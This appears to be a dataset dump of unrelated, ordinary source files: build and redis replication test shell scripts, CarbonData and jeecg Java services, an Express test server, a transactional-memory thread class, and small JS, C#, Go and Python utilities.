text
stringlengths
1
1.05M
#!/bin/bash
# Normalize whitespace in all C/C++ sources under a root directory:
# replace hard tabs with a single space, then run clang-format over
# the modules/ and examples/ trees.
#
# Usage: ./format.sh [ROOT_DIR]   (defaults to the current directory)

# Root is now a parameter instead of being hard-coded to `pwd`.
STARTDIR="${1:-$(pwd)}"

# Quote the root everywhere so paths containing spaces survive.
find "$STARTDIR" -iname '*.h' -type f -exec sed -i 's/\t/ /g' {} +
find "$STARTDIR" -iname '*.cpp' -type f -exec sed -i 's/\t/ /g' {} +

clang-format -i "$STARTDIR"/modules/*.cpp "$STARTDIR"/modules/*.h
clang-format -i "$STARTDIR"/examples/*/*.cpp
"use strict"; Object.defineProperty(exports, "__esModule", { value: true }); var Utils = /** @class */ (function () { function Utils() { } Utils.prototype.isNoEmptyString = function (value) { return typeof value === 'string' && value.length > 0; }; return Utils; }()); var utils = new Utils(); exports.default = utils; //# sourceMappingURL=Utils.js.map
using System.Runtime.Serialization;

/// <summary>
/// Serializable description of a CPU.
/// NOTE: the original class carried [DataMember] attributes but no
/// [DataContract]; DataContractSerializer ignores [DataMember] on
/// non-contract types, so Name/Order settings were dead. The contract
/// attribute is added and Name gets its missing member entry (Order 1,
/// matching the existing 2/3/4 sequence).
/// </summary>
[DataContract]
public class Processor
{
    // Marketing name of the processor, e.g. "Intel Core i7".
    [DataMember(Name = "Name", Order = 1)]
    public string Name { get; set; }

    [DataMember(Name = "NumberOfCores", Order = 2)]
    public int NumberOfCores { get; set; }

    [DataMember(Name = "NumberOfLogicalProcessors", Order = 3)]
    public int NumberOfLogicalProcessors { get; set; }

    // L2 cache size; unit not established by this file — presumably KB, verify against producer.
    [DataMember(Name = "L2CacheSize", Order = 4)]
    public int L2CacheSize { get; set; }
}
/* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.carbondata.datamap.bloom; import java.io.DataOutputStream; import java.io.IOException; import java.util.ArrayList; import java.util.HashMap; import java.util.List; import java.util.Map; import org.apache.carbondata.common.annotations.InterfaceAudience; import org.apache.carbondata.common.logging.LogService; import org.apache.carbondata.common.logging.LogServiceFactory; import org.apache.carbondata.core.constants.CarbonCommonConstants; import org.apache.carbondata.core.datamap.Segment; import org.apache.carbondata.core.datamap.dev.DataMapWriter; import org.apache.carbondata.core.datastore.block.SegmentProperties; import org.apache.carbondata.core.datastore.impl.FileFactory; import org.apache.carbondata.core.datastore.page.ColumnPage; import org.apache.carbondata.core.keygenerator.KeyGenerator; import org.apache.carbondata.core.keygenerator.columnar.ColumnarSplitter; import org.apache.carbondata.core.metadata.datatype.DataTypes; import org.apache.carbondata.core.metadata.encoder.Encoding; import org.apache.carbondata.core.metadata.schema.table.column.CarbonColumn; import org.apache.carbondata.core.metadata.schema.table.column.CarbonDimension; import 
org.apache.carbondata.core.util.CarbonUtil;

import org.apache.commons.collections.CollectionUtils;
import org.apache.commons.collections.Predicate;

import org.apache.hadoop.util.bloom.CarbonBloomFilter;
import org.apache.hadoop.util.bloom.Key;
import org.apache.hadoop.util.hash.Hash;

/**
 * Base writer that maintains one bloom filter per indexed column per blocklet
 * and appends the serialized filters to one datamap file per index column.
 */
@InterfaceAudience.Internal
public abstract class AbstractBloomDataMapWriter extends DataMapWriter {
  private static final LogService LOG = LogServiceFactory.getLogService(
      BloomDataMapWriter.class.getCanonicalName());
  // expected number of entries per filter (n in the bloom sizing formula)
  private int bloomFilterSize;
  // acceptable false-positive probability (p in the bloom sizing formula)
  private double bloomFilterFpp;
  private boolean compressBloom;
  protected int currentBlockletId;
  // per-index-column output file paths, parallel to currentDataOutStreams
  private List<String> currentDMFiles;
  private List<DataOutputStream> currentDataOutStreams;
  // one in-progress filter per index column, rebuilt after each blocklet
  protected List<CarbonBloomFilter> indexBloomFilters;
  private KeyGenerator keyGenerator;
  private ColumnarSplitter columnarSplitter;
  // for the dict/sort/date column, they are encoded in MDK,
  // this maps the index column name to the index in MDK
  private Map<String, Integer> indexCol2MdkIdx;
  // this gives the reverse map to indexCol2MdkIdx
  private Map<Integer, String> mdkIdx2IndexCol;

  AbstractBloomDataMapWriter(String tablePath, String dataMapName, List<CarbonColumn> indexColumns,
      Segment segment, String shardName, SegmentProperties segmentProperties,
      int bloomFilterSize, double bloomFilterFpp, boolean compressBloom) throws IOException {
    super(tablePath, dataMapName, indexColumns, segment, shardName);
    this.bloomFilterSize = bloomFilterSize;
    this.bloomFilterFpp = bloomFilterFpp;
    this.compressBloom = compressBloom;
    currentDMFiles = new ArrayList<>(indexColumns.size());
    currentDataOutStreams = new ArrayList<>(indexColumns.size());
    indexBloomFilters = new ArrayList<>(indexColumns.size());
    // open the per-column output files before allocating the first filters
    initDataMapFile();
    resetBloomFilters();

    keyGenerator = segmentProperties.getDimensionKeyGenerator();
    columnarSplitter = segmentProperties.getFixedLengthKeySplitter();
    this.indexCol2MdkIdx = new HashMap<>();
    this.mdkIdx2IndexCol = new HashMap<>();
    // walk dictionary-encoded dimensions in MDK order, recording the MDK slot
    // of every dimension that is also an index column
    int idx = 0;
    for (final CarbonDimension dimension : segmentProperties.getDimensions()) {
      if (!dimension.isGlobalDictionaryEncoding() && !dimension.isDirectDictionaryEncoding()) {
        continue;
      }
      boolean isExistInIndex = CollectionUtils.exists(indexColumns, new Predicate() {
        @Override public boolean evaluate(Object object) {
          return ((CarbonColumn) object).getColName().equalsIgnoreCase(dimension.getColName());
        }
      });
      if (isExistInIndex) {
        this.indexCol2MdkIdx.put(dimension.getColName(), idx);
        this.mdkIdx2IndexCol.put(idx, dimension.getColName());
      }
      idx++;
    }
  }

  @Override
  public void onBlockStart(String blockId) throws IOException {
  }

  @Override
  public void onBlockEnd(String blockId) throws IOException {
  }

  @Override
  public void onBlockletStart(int blockletId) {
  }

  // Discard the current filters and allocate a fresh, empty filter per index column.
  protected void resetBloomFilters() {
    indexBloomFilters.clear();
    List<CarbonColumn> indexColumns = getIndexColumns();
    int[] stats = calculateBloomStats();
    for (int i = 0; i < indexColumns.size(); i++) {
      indexBloomFilters
          .add(new CarbonBloomFilter(stats[0], stats[1], Hash.MURMUR_HASH, compressBloom));
    }
  }

  /**
   * It calculates the bits size and number of hash functions to calculate bloom.
   */
  private int[] calculateBloomStats() {
    /*
     * n: how many items you expect to have in your filter
     * p: your acceptable false positive rate
     * Number of bits (m) = -n*ln(p) / (ln(2)^2)
     * Number of hashes(k) = m/n * ln(2)
     */
    double sizeinBits = -bloomFilterSize * Math.log(bloomFilterFpp) / (Math.pow(Math.log(2), 2));
    double numberOfHashes = sizeinBits / bloomFilterSize * Math.log(2);
    int[] stats = new int[2];
    stats[0] = (int) Math.ceil(sizeinBits);
    stats[1] = (int) Math.ceil(numberOfHashes);
    return stats;
  }

  @Override
  public void onBlockletEnd(int blockletId) {
    // flush this blocklet's filters to disk, then start fresh for the next one
    writeBloomDataMapFile();
    currentBlockletId++;
  }

  @Override
  public void onPageAdded(int blockletId, int pageId, int pageSize, ColumnPage[] pages)
      throws IOException {
    for (int rowId = 0; rowId < pageSize; rowId++) {
      // for each indexed column, add the data to index
      for (int i = 0; i < indexColumns.size(); i++) {
        Object data = pages[i].getData(rowId);
        addValue2BloomIndex(i, data);
      }
    }
  }

  // Normalize one cell value to bytes and add it to the column's bloom filter.
  protected void addValue2BloomIndex(int indexColIdx, Object value) {
    byte[] indexValue;
    // convert measure to bytes
    // convert non-dict dimensions to simple bytes without length
    // convert internal-dict dimensions to simple bytes without any encode
    if (indexColumns.get(indexColIdx).isMeasure()) {
      if (value == null) {
        value = DataConvertUtil.getNullValueForMeasure(indexColumns.get(indexColIdx).getDataType());
      }
      indexValue = CarbonUtil.getValueAsBytes(indexColumns.get(indexColIdx).getDataType(), value);
    } else {
      if (indexColumns.get(indexColIdx).hasEncoding(Encoding.DICTIONARY)
          || indexColumns.get(indexColIdx).hasEncoding(Encoding.DIRECT_DICTIONARY)) {
        indexValue = convertDictionaryValue(indexColIdx, (byte[]) value);
      } else {
        indexValue = convertNonDictionaryValue(indexColIdx, (byte[]) value);
      }
    }
    // empty byte values are represented by the member-default sentinel
    if (indexValue.length == 0) {
      indexValue = CarbonCommonConstants.MEMBER_DEFAULT_VAL_ARRAY;
    }
    indexBloomFilters.get(indexColIdx).add(new Key(indexValue));
  }

  // Decode a dictionary-encoded value to its surrogate key and return it as INT bytes.
  protected byte[] convertDictionaryValue(int indexColIdx, byte[] value) {
    byte[] fakeMdkBytes;
    // this means that we need to pad some fake bytes
    // to get the whole MDK in corresponding position
    if (columnarSplitter.getBlockKeySize().length > indexCol2MdkIdx.size()) {
      int totalSize = 0;
      for (int size : columnarSplitter.getBlockKeySize()) {
        totalSize += size;
      }
      fakeMdkBytes = new byte[totalSize];
      // put this bytes to corresponding position
      int thisKeyIdx = indexCol2MdkIdx.get(indexColumns.get(indexColIdx).getColName());
      int destPos = 0;
      for (int keyIdx = 0; keyIdx < columnarSplitter.getBlockKeySize().length; keyIdx++) {
        if (thisKeyIdx == keyIdx) {
          System.arraycopy(value, 0, fakeMdkBytes, destPos,
              columnarSplitter.getBlockKeySize()[thisKeyIdx]);
          break;
        }
        destPos += columnarSplitter.getBlockKeySize()[keyIdx];
      }
    } else {
      fakeMdkBytes = value;
    }
    // for dict columns including dictionary and date columns
    // decode value to get the surrogate key
    int surrogateKey = (int) keyGenerator.getKey(fakeMdkBytes,
        indexCol2MdkIdx.get(indexColumns.get(indexColIdx).getColName()));
    // store the dictionary key in bloom
    return CarbonUtil.getValueAsBytes(DataTypes.INT, surrogateKey);
  }

  // Subclasses decide how plain (non-dictionary) dimension bytes are normalized.
  protected abstract byte[] convertNonDictionaryValue(int indexColIdx, byte[] value);

  // Create the datamap directory and open one output stream per index column.
  private void initDataMapFile() throws IOException {
    if (!FileFactory.isFileExist(dataMapPath)) {
      if (!FileFactory.mkdirs(dataMapPath, FileFactory.getFileType(dataMapPath))) {
        throw new IOException("Failed to create directory " + dataMapPath);
      }
    }
    List<CarbonColumn> indexColumns = getIndexColumns();
    for (int indexColId = 0; indexColId < indexColumns.size(); indexColId++) {
      String dmFile = BloomCoarseGrainDataMap.getBloomIndexFile(dataMapPath,
          indexColumns.get(indexColId).getColName());
      DataOutputStream dataOutStream = null;
      try {
        FileFactory.createNewFile(dmFile, FileFactory.getFileType(dmFile));
        dataOutStream = FileFactory.getDataOutputStream(dmFile,
            FileFactory.getFileType(dmFile));
      } catch (IOException e) {
        CarbonUtil.closeStreams(dataOutStream);
        throw new IOException(e);
      }
      this.currentDMFiles.add(dmFile);
      this.currentDataOutStreams.add(dataOutStream);
    }
  }

  // Serialize every column's current filter (tagged with the blocklet number)
  // to its stream; filters are always reset afterwards, success or failure.
  protected void writeBloomDataMapFile() {
    List<CarbonColumn> indexColumns = getIndexColumns();
    try {
      for (int indexColId = 0; indexColId < indexColumns.size(); indexColId++) {
        CarbonBloomFilter bloomFilter = indexBloomFilters.get(indexColId);
        bloomFilter.setBlockletNo(currentBlockletId);
        // only in higher version of guava-bloom-filter, it provides readFrom/writeTo interface.
        // In lower version, we use default java serializer to write bloomfilter.
        bloomFilter.write(this.currentDataOutStreams.get(indexColId));
        this.currentDataOutStreams.get(indexColId).flush();
      }
    } catch (Exception e) {
      for (DataOutputStream dataOutputStream : currentDataOutStreams) {
        CarbonUtil.closeStreams(dataOutputStream);
      }
      throw new RuntimeException(e);
    } finally {
      resetBloomFilters();
    }
  }

  @Override
  public void finish() throws IOException {
    if (!isWritingFinished()) {
      releaseResouce();
      setWritingFinished(true);
    }
  }

  // Close all per-column output streams. (Name keeps the original typo — it is
  // part of the protected interface that subclasses may override/call.)
  protected void releaseResouce() {
    List<CarbonColumn> indexColumns = getIndexColumns();
    for (int indexColId = 0; indexColId < indexColumns.size(); indexColId++) {
      CarbonUtil.closeStreams(
          currentDataOutStreams.get(indexColId));
    }
  }
}
/**
 * Test Server for ajax-client
 *
 * npm run test-server
 *
 * @type {createApplication}
 */
const server = {
    /**
     * Express-based echo server used by the ajax-client tests.
     * @param {number} [originalPort] port override; falls back to $PORT or 9999.
     */
    TestServer: function(originalPort) {
        const cookieParser = require('cookie-parser');
        const express = require('express');
        const bodyParser = require('body-parser');
        this.app = express();
        this.app.use(cookieParser());
        this.app.use(bodyParser.json());

        let port = process.env.PORT || 9999;
        if (originalPort) {
            port = originalPort;
        }

        //Allow CORS
        this.app.use(function(req, res, next) {
            res.header('Access-Control-Allow-Origin', req.headers.origin);
            res.header("Access-Control-Allow-Headers", "Origin,Content-Type,Accept,X-Original-Header1,X-Original-Header2");
            res.header('Access-Control-Allow-Methods', 'POST, GET, PUT, DELETE, OPTIONS');
            res.header('Access-Control-Allow-Credentials', true);
            next();
        });

        this.app.use(express.static(__dirname));

        /**
         * Factory for the four near-identical POST echo handlers
         * (previously four copy-pasted bodies).
         * @param {number} statusCode HTTP status to answer with.
         * @param {string} [cookieName] when set, a test cookie is written and
         *   the request's cookies are echoed back under 'req-cookies-copy'.
         * @param {string} [cookieValue] value for the test cookie.
         */
        const makeEchoHandler = function(statusCode, cookieName, cookieValue) {
            return function(req, res, next) {
                res.status(statusCode);
                const data = req.body;
                if (data) {
                    if (cookieName) {
                        res.cookie(cookieName, cookieValue, {
                            maxAge: 60000,
                            httpOnly: false,// true:cannot access from JS
                            secure: false,// true:can only send via HTTPS
                        });
                    }
                    const body = {
                        output: "Hi,there! You say " + data.message,
                    };
                    if (cookieName) {
                        body['req-cookies-copy'] = req.cookies;
                    }
                    res.json(body);
                } else {
                    res.json({ error: 'error:message not found.' });
                }
            };
        };

        //Handle 'post' as 'http://localhost:9999/api'
        this.app.post('/api', bodyParser.json(), makeEchoHandler(200));
        // Same echo, but always answers HTTP 500 (error-path testing).
        this.app.post('/api-error', bodyParser.json(), makeEchoHandler(500));
        // Sets a test cookie and echoes the request cookies back.
        this.app.post('/api-auth', bodyParser.json(), makeEchoHandler(200, 'test-name1', 'test-value1'));
        // Form-encoded variant of /api-auth.
        this.app.post('/form', bodyParser.urlencoded({ extended: true }), makeEchoHandler(200, 'test-name2', 'test-value2'));

        // GET echo: answers JSONP when a ?callback= is supplied, JSON otherwise.
        this.app.get('/api', bodyParser.json(), function(req, res, next) {
            res.status(200);
            const query = req.query;
            const data = req.body;
            const callback = query.callback;
            const jsonObj = {
                output: "Hi,there! You say " + query.message,
            };
            if (data) {
                if (callback) {
                    //jsonp
                    res.header('Content-Type', 'text/javascript;charset=utf-8');
                    res.end(callback + '(' + JSON.stringify(jsonObj) + ')');
                } else {
                    //ajax
                    res.json(jsonObj);
                }
            } else {
                res.json({ error: 'error:message not found.' });
            }
        });

        // Plain-text response.
        this.app.get('/text', bodyParser.json(), function(req, res, next) {
            res.status(200);
            res.end("example text response");
        });

        // Deliberately slow endpoint (3 s) for client timeout tests.
        this.app.get('/timeout', bodyParser.json(), function(req, res, next) {
            res.status(200);
            setTimeout(() => {
                res.json({
                    output: 'Hi! This is time out api.',
                });
            }, 3000);
        });

        this.server = this.app.listen(port);
        console.log('Server started on port:' + port);
    }
};

//Add methods to the class
server.TestServer.prototype = {
    // Shut the HTTP listener down.
    close: function() {
        console.log("Server closed");
        this.server.close();
    }
};

module.exports = server.TestServer;
package org.jeecg.modules.bim.service.impl;

import org.jeecg.common.exception.JeecgBootException;
import org.jeecg.common.util.oConvertUtils;
import org.jeecg.modules.bim.entity.BimModelAttrs;
import org.jeecg.modules.bim.mapper.BimModelAttrsMapper;
import org.jeecg.modules.bim.service.IBimModelAttrsService;
import org.springframework.stereotype.Service;
import com.baomidou.mybatisplus.core.conditions.query.QueryWrapper;
import org.springframework.transaction.annotation.Transactional;

import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;

import com.baomidou.mybatisplus.extension.service.impl.ServiceImpl;

/**
 * @Description: Model attributes (tree-structured; nodes track a hasChild flag)
 * @Author: jeecg-boot
 * @Date: 2021-12-20
 * @Version: V1.0
 */
@Service
public class BimModelAttrsServiceImpl extends ServiceImpl<BimModelAttrsMapper, BimModelAttrs> implements IBimModelAttrsService {

  @Override
  public void addBimModelAttrs(BimModelAttrs bimModelAttrs) {
    // A new node starts with hasChild = 0 (NOCHILD).
    bimModelAttrs.setHasChild(IBimModelAttrsService.NOCHILD);
    if(oConvertUtils.isEmpty(bimModelAttrs.getParentId())){
      bimModelAttrs.setParentId(IBimModelAttrsService.ROOT_PID_VALUE);
    }else{
      // Parent id is set: flag the parent as having children ("1") if it is not already.
      BimModelAttrs parent = baseMapper.selectById(bimModelAttrs.getParentId());
      if(parent!=null && !"1".equals(parent.getHasChild())){
        parent.setHasChild("1");
        baseMapper.updateById(parent);
      }
    }
    baseMapper.insert(bimModelAttrs);
  }

  @Override
  public void updateBimModelAttrs(BimModelAttrs bimModelAttrs) {
    BimModelAttrs entity = this.getById(bimModelAttrs.getId());
    if(entity==null) {
      throw new JeecgBootException("未找到对应实体");
    }
    String old_pid = entity.getParentId();
    String new_pid = bimModelAttrs.getParentId();
    // When the node is re-parented, fix both the old and the new parent's flags.
    if(!old_pid.equals(new_pid)) {
      updateOldParentNode(old_pid);
      if(oConvertUtils.isEmpty(new_pid)){
        bimModelAttrs.setParentId(IBimModelAttrsService.ROOT_PID_VALUE);
      }
      if(!IBimModelAttrsService.ROOT_PID_VALUE.equals(bimModelAttrs.getParentId())) {
        baseMapper.updateTreeNodeStatus(bimModelAttrs.getParentId(), IBimModelAttrsService.HASCHILD);
      }
    }
    baseMapper.updateById(bimModelAttrs);
  }

  @Override
  @Transactional(rollbackFor = Exception.class)
  public void deleteBimModelAttrs(String id) throws JeecgBootException {
    // Expand the selection to the node plus all of its descendants.
    id = this.queryTreeChildIds(id);
    if(id.indexOf(",")>0) {
      StringBuffer sb = new StringBuffer();
      String[] idArr = id.split(",");
      for (String idVal : idArr) {
        if(idVal != null){
          BimModelAttrs bimModelAttrs = this.getById(idVal);
          String pidVal = bimModelAttrs.getParentId();
          // Does this node's parent still have children outside the delete set?
          List<BimModelAttrs> dataList = baseMapper.selectList(new QueryWrapper<BimModelAttrs>().eq("parent_id", pidVal).notIn("id",Arrays.asList(idArr)));
          if((dataList == null || dataList.size()==0) && !Arrays.asList(idArr).contains(pidVal)
              && !sb.toString().contains(pidVal)){
            // Parent is losing its last child: remember it so its flag can be reset below.
            sb.append(pidVal).append(",");
          }
        }
      }
      // Batch-delete all collected nodes.
      baseMapper.deleteBatchIds(Arrays.asList(idArr));
      // Reset the has-child flag on parents that now have no children left.
      String[] pidArr = sb.toString().split(",");
      for(String pid : pidArr){
        this.updateOldParentNode(pid);
      }
    }else{
      BimModelAttrs bimModelAttrs = this.getById(id);
      if(bimModelAttrs==null) {
        throw new JeecgBootException("未找到对应实体");
      }
      updateOldParentNode(bimModelAttrs.getParentId());
      baseMapper.deleteById(id);
    }
  }

  @Override
  public List<BimModelAttrs> queryTreeListNoPage(QueryWrapper<BimModelAttrs> queryWrapper) {
    List<BimModelAttrs> dataList = baseMapper.selectList(queryWrapper);
    List<BimModelAttrs> mapList = new ArrayList<>();
    for(BimModelAttrs data : dataList){
      String pidVal = data.getParentId();
      // For non-root matches, climb recursively to the root node and collect it once.
      if(pidVal != null && !"0".equals(pidVal)){
        BimModelAttrs rootVal = this.getTreeRoot(pidVal);
        if(rootVal != null && !mapList.contains(rootVal)){
          mapList.add(rootVal);
        }
      }else{
        if(!mapList.contains(data)){
          mapList.add(data);
        }
      }
    }
    return mapList;
  }

  @Override
  public void updateTree() {
    baseMapper.updateTree();
  }

  /**
   * Re-derive the hasChild flag of the given (old) parent: when at most one
   * child row remains, the parent is marked NOCHILD.
   * @param pid parent node id
   */
  private void updateOldParentNode(String pid) {
    if(!IBimModelAttrsService.ROOT_PID_VALUE.equals(pid)) {
      Long count = baseMapper.selectCount(new QueryWrapper<BimModelAttrs>().eq("parent_id", pid));
      if(count==null || count<=1) {
        baseMapper.updateTreeNodeStatus(pid, IBimModelAttrsService.NOCHILD);
      }
    }
  }

  /**
   * Recursively resolve the root node of the subtree containing pidVal.
   * @param pidVal id of a node on the path
   * @return the root node, or null when the id does not resolve
   */
  private BimModelAttrs getTreeRoot(String pidVal){
    BimModelAttrs data = baseMapper.selectById(pidVal);
    if(data != null && !"0".equals(data.getParentId())){
      return this.getTreeRoot(data.getParentId());
    }else{
      return data;
    }
  }

  /**
   * Expand a comma-separated id list to include every descendant id.
   * @param ids comma-separated node ids
   * @return comma-separated ids including all children, without duplicates
   */
  private String queryTreeChildIds(String ids) {
    // Split the incoming id list.
    String[] idArr = ids.split(",");
    StringBuffer sb = new StringBuffer();
    for (String pidVal : idArr) {
      if(pidVal != null){
        if(!sb.toString().contains(pidVal)){
          if(sb.toString().length() > 0){
            sb.append(",");
          }
          sb.append(pidVal);
          this.getTreeChildIds(pidVal,sb);
        }
      }
    }
    return sb.toString();
  }

  /**
   * Recursively append all child ids of pidVal to the accumulator.
   * @param pidVal parent node id
   * @param sb accumulator of comma-separated ids
   * @return the same accumulator
   */
  private StringBuffer getTreeChildIds(String pidVal,StringBuffer sb){
    List<BimModelAttrs> dataList = baseMapper.selectList(new QueryWrapper<BimModelAttrs>().eq("parent_id", pidVal));
    if(dataList != null && dataList.size()>0){
      for(BimModelAttrs tree : dataList) {
        if(!sb.toString().contains(tree.getId())){
          sb.append(",").append(tree.getId());
        }
        this.getTreeChildIds(tree.getId(),sb);
      }
    }
    return sb;
  }
}
<reponame>779789571/gin-vue-admin<filename>server/collect/online/utils2.go package online import "strings" func IsContain(items []string, item string) bool { for _, eachItem := range items { if eachItem == item { return true } } return false } //将规则内占位符生成可用规则 func ReplaceStringWithInfos(list []string, string2 string, infos string) (ruleList []string) { infoList := strings.Split(infos, "|") for _, v := range list { for _, vv := range infoList { list := strings.Replace(v, string2, "\""+vv+"\"", 1) ruleList = append(ruleList, list) } } return ruleList } func AddAutoTimeBefore(ruleList []string, afterTime string) (withTimeruleList []string) { for _, v := range ruleList { withTimeruleList = append(withTimeruleList, v+afterTime) } return withTimeruleList }
class State:
    """Thermodynamic state of a substance at temperature T and pressure P."""

    def __init__(self, substance, T, P):
        self.substance = substance
        self.T = T
        self.P = P
        # Placeholder for properties like u, v, s
        self.properties = {}

    def define(self):
        """Populate self.properties for this state.

        Stub: returns a truthy value on success, falsy otherwise.
        """
        pass


class CustomClass:
    """Holds a property dict (u, v, s, ...) and supports exergy and addition."""

    def __init__(self, properties):
        self.properties = properties
        self._exergy = None

    def exergy(self, t0, p0):
        """Exergy relative to a water dead state at (t0, p0).

        Returns False when the dead state cannot be defined.
        """
        dead_state = State('Water', T=t0, P=p0)
        if not dead_state.define():
            return False
        du = self.properties['u'] - dead_state.properties['u']
        dv = self.properties['v'] - dead_state.properties['v']
        ds = self.properties['s'] - dead_state.properties['s']
        self._exergy = du + p0 * dv - t0 * ds
        return self._exergy

    def __add__(self, other):
        """Key-wise sum of property dicts; missing keys count as 0."""
        if not isinstance(other, CustomClass):
            raise TypeError("Unsupported operand type for +: 'CustomClass' and {}".format(type(other).__name__))
        merged = {}
        # Keys present in self come first, summed with other's value (or 0).
        for key, value in self.properties.items():
            merged[key] = value + other.properties.get(key, 0)
        # Keys only present in other are copied over afterwards.
        for key, value in other.properties.items():
            merged.setdefault(key, value)
        return CustomClass(merged)


# Example usage
prop1 = {'u': 100, 'v': 200, 's': 50}
prop2 = {'u': 150, 'v': 250, 's': 70}
obj1 = CustomClass(prop1)
obj2 = CustomClass(prop2)
result = obj1 + obj2  # Addition of two instances
exergy_result = obj1.exergy(300, 100)  # Calculating exergy
#! /usr/bin/bash
# Replication consistency test for NVM-enabled redis:
# start a local master and a remote slave, drive write load at the master,
# then compare key counts and DB digests between the two instances.

masterhost="192.168.16.1"
masterport="9000"
masterredis="/root/lina/redis-4.0-deg/redis-test/redis-4.0.0-volatile/src"
slavehost="192.168.16.100"
slaveport="9000"
slaveredis="/root/lina/redis-4.0.0-volatile/src"

nvm_maxcapacity=20
master_nvm_dir="/mnt/pmem4"
nvm_threshold="64"
slave_nvm_dir="/mnt/pmem8"

# Start the master locally, then the slave on the remote host via ssh.
"${masterredis}/redis-server" --nvm-maxcapacity "$nvm_maxcapacity" --nvm-dir "$master_nvm_dir" --nvm-threshold "$nvm_threshold" --bind "$masterhost" --port "$masterport" &
sleep 1
ssh "$slavehost" "$slaveredis/redis-server" --nvm-maxcapacity "$nvm_maxcapacity" --nvm-dir "$slave_nvm_dir" --nvm-threshold "$nvm_threshold" --bind "$slavehost" --port "$slaveport" --slaveof "$masterhost" "$masterport" &
sleep 1

# Load: small values in the background, larger sustained load in the foreground.
"${masterredis}/redis-benchmark" -h "$masterhost" -p "$masterport" -t set -d 128 -n 10000 -r 10000 &
"${masterredis}/redis-benchmark" -h "$masterhost" -p "$masterport" -t set -d 1024 -n 1000000 -r 100000

# printf instead of echo: bash's echo prints "\n" literally without -e.
printf '=====start comparing key count between master and slave...=====\n'
"${masterredis}/redis-cli" -h "$masterhost" -p "$masterport" info keyspace > masterkey.txt
"${masterredis}/redis-cli" -h "$masterhost" -p "$masterport" info keyspace
ssh "$slavehost" "$slaveredis/redis-cli" -h "$slavehost" -p "$slaveport" info keyspace > slavekey.txt
ssh "$slavehost" "$slaveredis/redis-cli" -h "$slavehost" -p "$slaveport" info keyspace
if diff masterkey.txt slavekey.txt; then
    echo "Passed. Master and slave key count are the same."
else
    echo "Failed. Master and slave key count are different."
fi

printf '=====start comparing DB digest code between master and slave...=====\n'
"${masterredis}/redis-cli" -h "$masterhost" -p "$masterport" debug digest > masterkey.txt
cat masterkey.txt
ssh "$slavehost" "$slaveredis/redis-cli" -h "$slavehost" -p "$slaveport" debug digest > slavekey.txt
cat slavekey.txt
if diff masterkey.txt slavekey.txt; then
    echo "Passed. Master and slave digest id are the same."
else
    echo "Failed. Master and slave digest id are different."
fi

# Clean up the scratch files and stop both redis instances.
rm -rf masterkey.txt slavekey.txt
ssh "$slavehost" pkill redis
pkill redis
jQuery(function($) {
    // Attach the page's CSRF token to every jQuery AJAX request
    // (token is published on window.__csrf_token).
    var attachCsrfToken = function(xhr, settings) {
        xhr.setRequestHeader('X-CSRFToken', window.__csrf_token);
    };
    $.ajaxSetup({ beforeSend: attachCsrfToken });
});
/*
 * TThread.java
 *
 * Created on January 3, 2007, 9:01 PM
 *
 * From "The Art of Multiprocessor Programming",
 * by <NAME> and <NAME>.
 *
 * This work is licensed under a Creative Commons Attribution-Share Alike 3.0 United States License.
 * http://i.creativecommons.org/l/by-sa/3.0/us/88x31.png
 */
package tamp.ch18.TinyTM;

import tamp.ch18.TinyTM.exceptions.AbortedException;
import tamp.ch18.TinyTM.exceptions.PanicException;

import java.util.concurrent.Callable;
import java.util.concurrent.atomic.AtomicInteger;

/**
 * Transactional thread: runs a Callable inside a software transaction,
 * retrying on abort until the thread is interrupted. Lifecycle hooks
 * (onStart/onAbort/onCommit/onValidate) are pluggable static handlers.
 */
public class TThread extends java.lang.Thread {
  // Pluggable lifecycle handlers; defaults are no-ops / always-true.
  static Runnable onStart = new DefaultRunnable();
  static Runnable onAbort = new DefaultRunnable();
  static Runnable onCommit = new DefaultRunnable();
  static Callable<Boolean> onValidate = new DefaultCallable();
  // Global commit/abort counters across all transactional threads.
  static public final AtomicInteger commits = new AtomicInteger(0);
  static public final AtomicInteger aborts = new AtomicInteger(0);

  public TThread() {
  }

  /**
   * Run xaction transactionally: start a fresh Transaction, execute the
   * callable, and commit if validation succeeds. On abort the loop retries
   * with a new transaction; the loop only ends via a successful commit, a
   * PanicException from an unexpected error, or thread interruption.
   *
   * @param xaction the work to execute atomically
   * @return the callable's result from the committed attempt
   * @throws InterruptedException when the thread is interrupted before commit
   * @throws PanicException wrapping any unexpected exception from the callable
   */
  public static <T> T doIt(Callable<T> xaction) throws Exception {
    T result;
    Transaction me;
    Thread myThread = Thread.currentThread();
    Exception rethrow = null;
    while (!myThread.isInterrupted()) {
      me = new Transaction();
      Transaction.setLocal(me);
      onStart.run();
      try {
        result = xaction.call();
        if (onValidate.call() && me.commit()) {
          commits.getAndIncrement();
          onCommit.run();
          return result;
        }
      } catch (AbortedException e) {
        // expected: fall through to the retry bookkeeping below
      } catch (InterruptedException e) {
        // re-assert the interrupt flag so the while-condition terminates the loop
        myThread.interrupt();
      } catch (Exception e) {
        throw new PanicException(e);
      }
      aborts.getAndIncrement();
      onAbort.run();
    }
    throw new InterruptedException();
  }

  public static void onStart(Runnable handler) {
    onStart = handler;
  }

  public static void onCommit(Runnable handler) {
    onCommit = handler;
  }

  public static void onAbort(Runnable handler) {
    onAbort = handler;
  }

  public static void onValidate(Callable<Boolean> handler) {
    onValidate = handler;
  }

  // No-op handler used as the default for onStart/onAbort/onCommit.
  static class DefaultRunnable implements Runnable {
    public void run() {
    }
  }

  // Always-valid handler used as the default for onValidate.
  static class DefaultCallable implements Callable<Boolean> {
    public Boolean call() {
      return true;
    }
  }
}
